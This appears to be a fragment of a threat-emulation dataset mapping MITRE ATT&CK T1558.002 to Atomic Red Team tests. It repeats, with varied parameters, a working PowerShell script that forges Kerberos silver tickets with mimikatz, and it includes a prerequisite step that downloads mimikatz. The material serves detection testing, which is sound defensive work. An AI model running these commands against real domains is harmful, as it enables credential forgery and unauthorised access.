directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session metadata", + "description": "Data and information that describe a logon session (such as logon type) and activity within it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "logon session" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1558.002", + "command_list": [ + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"S-1-5-21-DEFAULT\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp 
file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas 
/netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.%userdnsdomain% /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.%userdnsdomain%\n schtasks /query /S #{target}.%userdnsdomain%\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount 
$domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:silverticketfakeuser /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from 
https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:%logonserver:\\\\=%.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S %logonserver:\\\\=%.#{domain}\n schtasks /query /S %logonserver:\\\\=%.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt 
-ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat 
-ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n $env:TEMP\\mimikatz\\x64\\mimikatz.exe \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' 
can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n" + ], + "commands": [ + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"S-1-5-21-DEFAULT\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content 
-Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.%userdnsdomain% /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.%userdnsdomain%\n schtasks /query /S #{target}.%userdnsdomain%\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run 
batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:silverticketfakeuser /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo 
executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output 
otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:%logonserver:\\\\=%.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S %logonserver:\\\\=%.#{domain}\n schtasks /query /S %logonserver:\\\\=%.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = 
$krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf 
($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n $env:TEMP\\mimikatz\\x64\\mimikatz.exe \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + 
"name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1558.002", + "display_name": "Steal or Forge Kerberos Tickets: Silver Ticket", + "atomic_tests": [ + { + "name": "Crafting Active Directory silver tickets with mimikatz", + "auto_generated_guid": "385e59aa-113e-4711-84d9-f637aef01f2c", + "description": "Once the hash of service account is retrieved it is possible to forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets.\nThe generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain_sid": { + "description": "SID of the targeted domain, if you keep default it will automatically get the current domain SID", + "type": "String", + "default": "S-1-5-21-DEFAULT" + }, + "domain": { + "description": "Targeted Active Directory domain FQDN", + "type": "String", + "default": "%userdnsdomain%" + }, + "account": { + "description": "Account to impersonate", + "type": "String", + "default": "silverticketfakeuser" + }, + "target": { + "description": "System you want to target (Default will be logon server)", + "type": "String", + "default": "%logonserver:\\\\=%" + }, + "service_aes256_key": { + "description": "AES256 key (you will need to set to match your service key for your target)", + "type": "String", + "default": "b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9" + }, + "mimikatz_path": { + "description": "Mimikatz windows executable", + "type": "Path", + "default": "$env:TEMP\\mimikatz\\x64\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})\n", + "prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\nif (Test-Path $mimikatz_path) {exit 0} 
else {exit 1}\n", + "get_prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\mimikatz.zip\"\nExpand-Archive $env:TEMP\\mimikatz.zip $env:TEMP\\mimikatz -Force\nNew-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null\nMove-Item $env:TEMP\\mimikatz\\x64\\mimikatz.exe $mimikatz_path -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n 